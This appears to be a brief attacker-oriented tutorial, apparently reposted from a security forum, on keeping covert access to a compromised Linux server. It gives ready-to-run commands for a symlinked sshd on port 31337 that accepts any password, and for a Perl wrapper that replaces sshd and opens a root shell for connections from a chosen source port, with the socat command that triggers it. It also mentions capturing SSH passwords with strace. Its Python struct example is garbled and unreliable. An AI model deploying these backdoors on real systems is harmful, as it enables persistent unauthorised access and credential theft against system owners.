Use some tricks to fool rookie admins.
1. After gaining SHELL access (no firewall restrictions), quickly open an SSH port
Execute on the compromised server:
1 |
mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; |
This spawns an SSH service on port 31337; connect with root/bin/ftp/mail as username, any password.
Preview:

2. Create an SSH wrapper backdoor (better than #1 — no extra open port, works as long as SSH is running on the target)
On the compromised server:
1 |
[root@localhost ~]# cd /usr/sbin |
2 |
[root@localhost sbin]# mv sshd ../bin |
3 |
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd |
4 |
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd |
5 |
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd |
6 |
[root@localhost sbin]# chmod u+x sshd |
7 |
[root@localhost sbin]# /etc/init.d/sshd restart |
On your local machine:
1 |
socat STDIO TCP4:10.18.180.20:22,sourceport=13377 |
If you want to change the source port, use Python’s struct standard library.
1 |
>>> import struct |
2 |
>>> buffer = struct.pack('>I6',19526) |
3 |
>>> print repr(buffer) |
4 |
'/x00/x00LF' |
5 |
>>> buffer = struct.pack('>I6',13377) |
6 |
>>> print buffer |
7 |
4A |
Preview:

3. Log SSH client passwords
After owning a host, use strace to record SSH passwords when it connects to other hosts.
Preview:

[via@dropwooyun]